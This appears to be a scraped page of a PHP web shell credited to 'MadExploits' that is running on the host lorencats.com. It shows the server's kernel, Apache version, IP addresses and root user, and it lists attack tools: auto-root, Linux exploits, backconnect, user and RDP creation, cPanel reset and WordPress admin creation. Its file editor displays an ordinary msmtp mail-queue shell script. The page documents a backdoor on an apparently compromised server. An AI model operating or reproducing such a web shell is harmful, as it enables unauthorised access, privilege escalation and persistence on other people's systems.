Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
msmtp /
examples /
msmtpqueue /
[ HOME SHELL ]
Name
Size
Permission
Action
ChangeLog
1.06
KB
-rw-r--r--
README
2.53
KB
-rw-r--r--
msmtp-enqueue.sh
1.05
KB
-rwxr-xr-x
msmtp-listqueue.sh
175
B
-rwxr-xr-x
msmtp-runqueue.sh
1.2
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : msmtp-runqueue.sh
#!/usr/bin/env bash QUEUEDIR="$HOME/.msmtpqueue" LOCKFILE="$QUEUEDIR/.lock" MAXWAIT=120 OPTIONS=$@ # wait for a lock that another instance has set WAIT=0 while [ -e "$LOCKFILE" -a "$WAIT" -lt "$MAXWAIT" ]; do sleep 1 WAIT="`expr "$WAIT" + 1`" done if [ -e "$LOCKFILE" ]; then echo "Cannot use $QUEUEDIR: waited $MAXWAIT seconds for" echo "lockfile $LOCKFILE to vanish, giving up." echo "If you are sure that no other instance of this script is" echo "running, then delete the lock file." exit 1 fi # change into $QUEUEDIR cd "$QUEUEDIR" || exit 1 # check for empty queuedir if [ "`echo *.mail`" = '*.mail' ]; then echo "No mails in $QUEUEDIR" exit 0 fi # lock the $QUEUEDIR touch "$LOCKFILE" || exit 1 # process all mails for MAILFILE in *.mail; do MSMTPFILE="`echo $MAILFILE | sed -e 's/mail/msmtp/'`" echo "*** Sending $MAILFILE to `sed -e 's/^.*-- \(.*$\)/\1/' $MSMTPFILE` ..." if [ ! -f "$MSMTPFILE" ]; then echo "No corresponding file $MSMTPFILE found" echo "FAILURE" continue fi msmtp $OPTIONS `cat "$MSMTPFILE"` < "$MAILFILE" if [ $? -eq 0 ]; then rm "$MAILFILE" "$MSMTPFILE" echo "$MAILFILE sent successfully" else echo "FAILURE" fi done # remove the lock rm -f "$LOCKFILE" exit 0
Close